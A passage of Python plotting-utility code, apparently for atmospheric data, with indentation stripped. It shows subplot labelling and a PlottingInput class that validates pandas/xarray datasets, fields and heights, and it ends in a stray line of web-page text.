axv[r*ncols].set_ylabel(args.fieldlabels[args.fields[r]])
except KeyError:
pass
# Align labels
_align_labels(fig,axv,nrows,ncols)
# Set frequency limits if specified
if not freqlimits is None:
axv[0].set_xlim(freqlimits)
# Number sub figures as a, b, c, ...
if labelsubplots is not False:
try:
hoffset, voffset = labelsubplots
except (TypeError, ValueError):
hoffset, voffset = -0.14, -0.18
for i,axi in enumerate(axv):
axi.text(hoffset,voffset,'('+chr(i+97)+')',transform=axi.transAxes,size=16)
# Add legend
if showlegend:
leg = _format_legend(axv,index=ncols-1)
return fig, ax
# ---------------------------------------------
#
# DEFINITION OF AUXILIARY CLASSES AND FUNCTIONS
#
# ---------------------------------------------
class InputError(Exception):
"""Exception raised for errors in the input.
Attributes:
message -- explanation of the error
"""
def __init__(self, message):
self.message = message
class PlottingInput(object):
"""
Auxiliary class to collect input data and options for plotting
functions, and to check if the inputs are consistent
"""
supported_datatypes = (
pd.Series,
pd.DataFrame,
xr.DataArray,
xr.Dataset,
)
def __init__(self, datasets, fields, **argd):
# Add all arguments as class attributes
self.__dict__.update({'datasets':datasets,
'fields':fields,
**argd})
# Check consistency of all attributes
self._check_consistency()
def _check_consistency(self):
"""
Check consistency of all input data
"""
# ----------------------
# Check dataset argument
# ----------------------
# If a single dataset is provided, convert to a dictionary
# under a generic key 'Dataset'
if isinstance(self.datasets, self.supported_datatypes):
self.datasets = {'Dataset': self.datasets}
for dfname,df in self.datasets.items():
# convert dataset types here
if isinstance(df, (xr.Dataset,xr.DataArray)):
# handle xarray datatypes
self.datasets[dfname] = df.to_dataframe()
columns = self.datasets[dfname].columns
if len(columns) == 1:
# convert to pd.Series
self.datasets[dfname] = self.datasets[dfname][columns[0]]
else:
assert(isinstance(df, self.supported_datatypes)), \
"Dataset {:s} of type {:s} not supported".format(dfname,str(type(df)))
# ----------------------
# Check fields argument
# ----------------------
# If no fields are specified, check that
# - all datasets are series
# - the name of every series is either None or matches other series names
if self.fields is None:
assert(all([isinstance(self.datasets[dfname],pd.Series) for dfname in self.datasets])), \
"'fields' argument must be specified unless all datasets are pandas Series"
series_names = set()
for dfname in self.datasets:
series_names.add(self.datasets[dfname].name)
if len(series_names)==1:
self.fields = list(series_names)
else:
raise InputError('attempting to plot multiple series with different field names')
elif isinstance(self.fields,str):
# If fields='all', retrieve fields from dataset
if self.fields=='all':
self.fields = _get_fieldnames(list(self.datasets.values())[0])
assert(all([_get_fieldnames(df)==self.fields for df in self.datasets.values()])), \
"The option fields = 'all' only works when all datasets have the same fields"
# If fields is a single instance, convert to a list
else:
self.fields = [self.fields,]
# ----------------------------------
# Check match of fields and datasets
# ----------------------------------
# Check if all datasets have at least one of the requested fields
for dfname in self.datasets:
df = self.datasets[dfname]
if isinstance(df,pd.DataFrame):
assert(any([field in df.columns for field in self.fields])), \
'DataFrame '+dfname+' does not contain any of the requested fields'
elif isinstance(df,pd.Series):
if df.name is None:
assert(len(self.fields)==1), \
'Series must have a name if more than one fields is specified'
else:
assert(df.name in self.fields), \
'Series '+dfname+' does not match any of the requested fields'
# ---------------------------------
# Check heights argument (optional)
# ---------------------------------
try:
# If no heights are specified, check that all datasets combined have
# no more than one height value
if self.heights is None:
av_heights = set()
for df in self.datasets.values():
heightvalues = _get_dim_values(df,'height')
try:
for height in heightvalues:
av_heights.add(height)
except TypeError:
# heightvalues is None
pass
if len(av_heights)==0:
# None of the datasets have height values
self.heights = [None,]
elif len(av_heights)==1:
self.heights = list(av_heights)
else:
raise InputError("found more than one height value so 'heights' argument must be specified")
# If heights='all', retrieve heights from dataset
elif isinstance(self.heights,str) and self.heights=='all':
self.heights = _get_dim_values(list(self.datasets.values())[0],'height')
assert(all([np.allclose(_get_dim_values(df,'height'),self.heights) for df in self.datasets.values()])), \
"The option heights = 'all' only works when |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.